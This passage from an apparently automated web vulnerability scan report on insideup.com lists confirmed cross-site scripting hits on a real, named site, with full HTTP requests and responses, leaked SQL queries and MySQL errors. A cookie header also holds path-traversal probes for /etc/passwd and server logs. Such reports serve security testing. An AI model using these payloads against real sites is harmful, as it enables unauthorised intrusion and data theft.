lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E

/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005C8)</script>

Request

GET /ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:34 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=86kigrjppkr57lue04dn65iav5; path=/
Content-Length: 2953
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>' OR prj.project_page_url = 'leadflow/bulo00/'"--></style></script><script>netsparker(0x0005C8)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C8)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/

/ppc/leadflow/bulo00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/?'"--></style></script><script>alert(0x0005CB)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005CB)</script>

Request

GET /ppc/leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:37 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vp7uoea37b18l3htgqem4g3882; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>' OR prj.project_page_url = 'leadflow/bulo00/?'"--></style></script><script>netsparker(0x0005CB)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CB)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/s..

Parameters

Parameter Type Value
catId GET 60003
iusrc GET '"--></style></script><script>alert(0x0005C9)</script>

Request

GET /ppc/leadflow/inco00/project.php?catId=60003&iusrc='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C9)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=e7pk8akqc7ql41mhkjn57e51v0; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join 
lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?catId=60003&iusrc='"--></style></script><script>netsparker(0x0005C9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/

/ppc/leadflow/inco00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/?'"--></style></script><script>alert(0x0005BF)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0005BF)</script>

Request

GET /ppc/leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script> HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/inco00/project.php?catId=60003&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b9ujpggj9nj4131qggkne5mgg6; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 
'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>' OR prj.project_page_url = 'leadflow/inco00/?'"--></style></script><script>netsparker(0x0005BF)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005BF)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php

/ppc/leadflow/bulo00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005CC)</script>

Request

GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:14 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=g30btf2on3prrmcnaf77vbpmj2; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join 
sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005CC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005CC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E

/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CF)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
catId GET 30005
iusrc GET iupsc
URI-BASED Raw URI '"--></style></script><script>alert(0x0005CF)</script>

Request

GET /ppc/leadflow/bulo00/project.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005CF)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:25:17 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=nfvhh77t7n2gv7mj76vrmen6h1; path=/
Content-Length: 3063
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>' OR prj.project_page_url = 'leadflow/bulo00/project.php'"--></style></script><script>netsparker(0x0005CF)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where 
